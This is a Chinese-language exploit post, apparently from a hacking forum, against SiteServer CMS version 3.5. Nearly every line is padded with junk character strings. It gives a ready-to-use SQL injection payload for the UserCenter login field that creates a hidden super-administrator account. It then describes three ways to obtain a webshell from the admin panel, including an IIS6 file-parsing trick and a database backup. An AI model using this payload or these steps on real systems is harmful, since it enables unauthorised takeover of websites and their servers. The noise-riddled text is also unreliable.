经测试秒杀最新的3.5版2 M% k4 T. P7 x* v. c& J1 l
stieserver官网:www.siteserver.cn+ E* `( d- ?* P: t) y D: B
EXP:6 x$ H# a5 {* o8 _" K# L
直接访问UserCenter/login.aspx% ?3 O( a4 J/ H% M1 D8 f$ m
用户名处输入:
8 X, T& @" D6 a. U1 N2 U2 ` S4 s& a6 Z( V5 @$ Q J! @
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
* X: r) x: n( R% m) x密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
5 M) Z) G7 c, J, I# g之后再访问后台SiteServer/login.aspx用插入的用户登陆! [: G. i7 ]+ I5 E) {2 O: ]9 u
后台拿webshell的三种方法:
4 t( s! ^4 d7 E+ ^% w一、
% j1 e0 X: C0 [5 t5 A- n站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx0 H/ @5 K0 j2 r5 x* y$ h
二、
2 \0 o2 _! U# w3 n( g- }" i成员权限-》添加用户-》用户名为:1.asp
2 Y$ R$ l+ M4 u1 Ghttp://127.0.0.1/usercenter/
4 z& `9 k6 j% n+ y& |. ~" p# h用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
9 n9 _/ G7 Q* Q" `(ps:后台添加用户时不会验证是否含有非法字符)
* X) [* a4 q. k/ `! f3 m三、' x! L, s1 z# i, {) ]7 l1 k
系统工具-》实用工具-》机器参数查看
2 u s/ Y, T+ ?! N3 I: v可以看到数据库类型、名称,WEB路径
, T; \- ?9 H. l5 Z6 Z系统工具-》数据库工具-》SQL语句查询4 i9 H2 \& ~1 I3 c: t8 f x2 p
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |